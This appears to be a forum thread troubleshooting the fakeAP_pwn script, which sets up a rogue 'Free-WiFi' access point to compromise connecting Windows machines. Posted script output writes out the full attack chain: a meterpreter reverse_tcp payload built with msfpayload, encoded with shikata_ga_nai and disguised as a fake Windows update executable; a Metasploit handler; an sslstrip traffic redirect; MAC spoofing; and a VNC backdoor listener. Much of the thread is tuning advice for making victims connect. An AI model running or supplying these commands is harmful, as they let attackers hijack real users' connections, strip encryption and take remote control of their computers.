[Script] [Video] FakeAP_pwn (v0.2.1)

[parrotface]

Does this mean my airbase-ng is broken or airbase-ng in general is broken.
If it's mine can I just re-install airbase-ng?

[slowz3r]

Wifi card = Atheros built into eeepc - driver ath5k
client XP SP2 HP laptop shows max signal strength
kernel version 2.6.30.9
ping 10.0.0.1 17ms, 7ms, 18ms, 3ms, average 11ms re- pings average 38ms, 28ms, 3ms
ping google.co.uk 83, 47, 50, 63 average 60ms re-ping average 81, 94, 59ms
How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt something happened when the script ran but can't find any file output.txt
thanks

Output should be in the directory your ran the script in, You try running it again?

[Jelly]

Hm.. My "victim" dosent get any IP from the DHCP..

Injection and monitor works on wlan0 and mon0.
I use a rtl8187 based card, with mac80211.

Output:

Code:

[*] g0tmilk's fakeAP_pwn v0.3-RC12
[>] Checking environment...
[i]            ESSID=Free-WiFi
[i]    fakeAPchannel=6
[i]        interface=eth0
[i]    wifiInterface=wlan0
[i] monitorInterface=mon0
[i]          payload=vnc
[i]     backdoorPath=/root/backdoor.exe
[i]   metasploitPath=/pentest/exploits/framework3
[i]    htdocs_folder=/var/www/fakeAP_pwn
[i]              mtu=1800
[i]      transparent=true
[i]      respond2All=false
[i]        fakeAPmac=true
[i]           extras=false
[i]            debug=false
[i]          verbose=2
[i]        gatewayIP=192.168.32.2
[i]            ourIP=192.168.32.128
[i]             port=50981
[>] Stopping services and programs...
[i] Command: killall dhcpd3 apache2 airbase-ng wicd-client
[i] Command: /etc/init.d/dhcp3-server stop
[i] Command: /etc/init.d/apache2 stop
[>] Setting up wireless card...
[i] Command: airmon-ng stop mon0
[i] Command: ifconfig wlan0 down
[i] Command: ifconfig wlan0 up
[i] Command: airmon-ng start wlan0
[>] Changing MAC Address...
[i] Command: ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
[i]       macAddress=16:8c:9e:65:06:df (unknown)
[>] Creating scripts...
[i] Created: /tmp/fakeAP_pwn.rb
[i] Created: /etc/apache2/sites-available/fakeAP_pwn
[>] Creating exploit...(Windows)
[i] Command: /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /pentest/exploits/framework3/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
[>] Creating our fake access point...
[i] Command: airbase-ng -c 6 -e "Free-WiFi" mon0 -v
[>] Setting up our end...
[i] Command: chmod 775 /var/run/
[i] Command: touch /var/lib/dhcp3/dhcpd.leases
[>] Starting Metasploit...
[i] Command: /pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/tmp/fakeAP_pwn.rb E
[>] Starting SSLStrip...
[i] Command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
[i] Command: sslstrip -k -f -l 10000
[>] Starting DHCP server...
[i] Command: dhcpd3 -d -f -cf /tmp/fakeAP_pwn.dhcp at0
[>] Starting Web server...
[i] Command: /etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && /etc/init.d/apache2 reload
[>] Getting the backdoor (VNC) ready...
[i] Command: vncviewer -listen
[>] Forcing target to vist our site...
[*] Waiting for target to connect...

[>] Cleaning up...
[i] Command: ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && /etc/init.d/apache2 reload
[>] Done! (= Have you... g0tmi1k?

Any clues?

[g0tmi1k]

Mine takes about 2 mins not actualy timed it.

Further testing has shown another problem which I have had previously.
If I start my attack machine without eth0 connected to my network it fails because eth0 does not have a IP address.
Now before running script "ifconfig eth0 192.168.3.101 netmask 255.255.255.0 broadcast 192.168.3.255" the script now runs.
I guess this is a fairly simple fix with an if statement No IP then ifconfig etc etc.
After downloading and running the update mine took approx 90 seconds to get a meterpreter>

Thanks for the info!
Ill look into it!

Wifi card = Atheros built into eeepc - driver ath5k
client XP SP2 HP laptop shows max signal strength
kernel version 2.6.30.9
ping 10.0.0.1 17ms, 7ms, 18ms, 3ms, average 11ms re- pings average 38ms, 28ms, 3ms
ping google.co.uk 83, 47, 50, 63 average 60ms re-ping average 81, 94, 59ms
How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt something happened when the script ran but can't find any file output.txt
thanks

Thanks for the info!
the output.txt file should be wherever you ran it from...
If you change it to:
bash fakeAP_pwn.sh -V > ~/output.txt
It should go into your user folder.

Hm.. My "victim" dosent get any IP from the DHCP..

Injection and monitor works on wlan0 and mon0.
I use a rtl8187 based card, with mac80211.

Output:

Code:

 blah

Any clues?

What does it get? 0.0.0.0? 169.x.x.x?
What is the signal strength?
What version are you using?
What is shown in the FakeAP Window? DHCP Window?

Awesome script

Few quick things i noticed ..

line 251, the sleep timer needs to be incresed just a tad, mine kept failing out at 5 seconds so i changed it to 10. That could be because im in a VM tho.

line 261, you might want to change to macchanger -A, as i noticed that a totally random mac would fail sometimes when boxes tried to connect


The last thing really cant be fixed here but its totally worth noting. airbase-ng has "atleast in my opnion" horrible beacons, meaning any windows 7 box can not connect to your fakeAP. It also tends to spew out a TON of beacons with a null ssid so for instance if you look in windows zeroconf "or whatever the hell they call it" youll always see a "Other Network".

I was kicking around a way to solve this last night and one of the ideas that i came up with was using a combo of aireplay-ng and packetforge-ng to grep out a beacon from a pcap "Or you could make your own " then having an option in airbase-ng to replay your custom beacon.

Anyways great script and thanks again

Thanks for the thanks!
and thanks for the info/hints! (=
Personally - my Windows 7 (and XP & ubuntu box) connects fine to it 95% of the time. Once twice has it said "other network".
Saying that, Joker believes airbase-ng is the reason why its "slow" for some people some of the time, and hes had a few ideas on how to change it! So its another why airbase-ng may not be used in later releases...

I'm liking the idea of "beacon from a pcap" mind you!




Thanks for the feedback guys!

[Jelly]

What does it get? 0.0.0.0? 169.x.x.x?
What is the signal strength?
What version are you using?
What is shown in the FakeAP Window? DHCP Window?

a) It Dosent get anything, DHCP-timeout and then it sets its private ip...
b) Full strenght
c) Latest fakeAP_pwn v0.3-RC12 (Read the first line of the output )
d) Probes and Join in FakeAP, Nothing expect the "default" in DHCP (I check it later)

[joker5bb]

Does this mean my airbase-ng is broken or airbase-ng in general is broken.
If it's mine can I just re-install airbase-ng?

airbase-ng has many bugs, it you have an atheros card you can try hostAP
if you don't have an atheros card yo can use a hardware wireless AP

[kernel831]

Another progress report for you.. running 0.3-RC10..

* Your WiFi card + driver = alfa card, rtl8187
* Your kernel version = FRESH install of bt4 w/ 2.6.30.9
* Signal strength of the AP = 100%
* The time it takes to ping the AP = avg 23 MS
* The time it takes to ping google.com when connect to the fakeAP =avg 63 MS
*Output: No Errors
* MTU set to match my card / router at 1500.
* There is some definite inconsistency with DHCP, although after tweaking I'm successfully dishing out IP with no problem.
*The forced website redirection, download link (mirror link only, update.microsoft.com link times out), and apache servers downloads all work flawlessly on XP.

As for the exploit, both VNC and SBD are failing for me, It gets to the point of executing the .rb script.. below is the output. It never passes this...


As a note, still no AVs or firewalls on the hosts, and cache/cookies is cleared out before any of my tests. No connection, remote destop, or remote command line is made. Good luck and great work so far.

Modifications to 0.3-RC10 - Commented out Line #547

Code:

#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

EDIT(Important) - I believe that I may have found the variable giving people such scattered results with DHCP / Limited Connectivity! I continued some testing with my windows 7(x64) box trying to duplicate the results I posted above..
I'v found that using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, And my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor mode compatible, B / G card which is serving the AP..

When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!

[slowz3r]

EDIT(Important) - I believe that I may have found the variable giving people such scattered results with DHCP / Limited Connectivity! I continued some testing with my windows 7(x64) box trying to duplicate the results I posted above..
I'v found that ANYONE using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, And my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor mode compatible, B / G card which is serving the AP..

When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!

Hmmmm, not sure if thats entirely true, it may be it some situations but in my case my Target PC is a Windows 7 X64 pc running a Wireless N card and it connects to the AP will full connectivity but it only gains "full connectivity" after selecting one of these options from the annoying pop up window in 7

[kernel831]

Hmmmm, not sure if thats entirely true, it may be it some situations but in my case my Target PC is a Windows 7 X64 pc running a Wireless N card and it connects to the AP will full connectivity but it only gains "full connectivity" after selecting one of these options from the annoying pop up window in 7

Interesting , I just tested this and came up with the same results I posted earlier, even after changing the ESSID and selecting both home / work network locations on my win7(x64) machine. Does the card hosting your AP have wireless-N compatibility(mabey a b/g/n card)?

Also the WinXP laptop iv been testing with has a built in b/g card which supports the theory as well since its generally been working on that machine.

[slowz3r]

Interesting , I just tested this and came up with the same results I posted earlier, even after changing the ESSID and selecting both home / work network locations on my win7(x64) machine. Does the card hosting your AP have wireless-N compatibility(mabey a b/g/n card)?

Also the WinXP laptop iv been testing with has a built in b/g card which supports the theory as well since its generally been working on that machine.

Nope, no N capability on my hosting card, What N cards are you connecting with? Mine is a DW1525 in a Dell desktop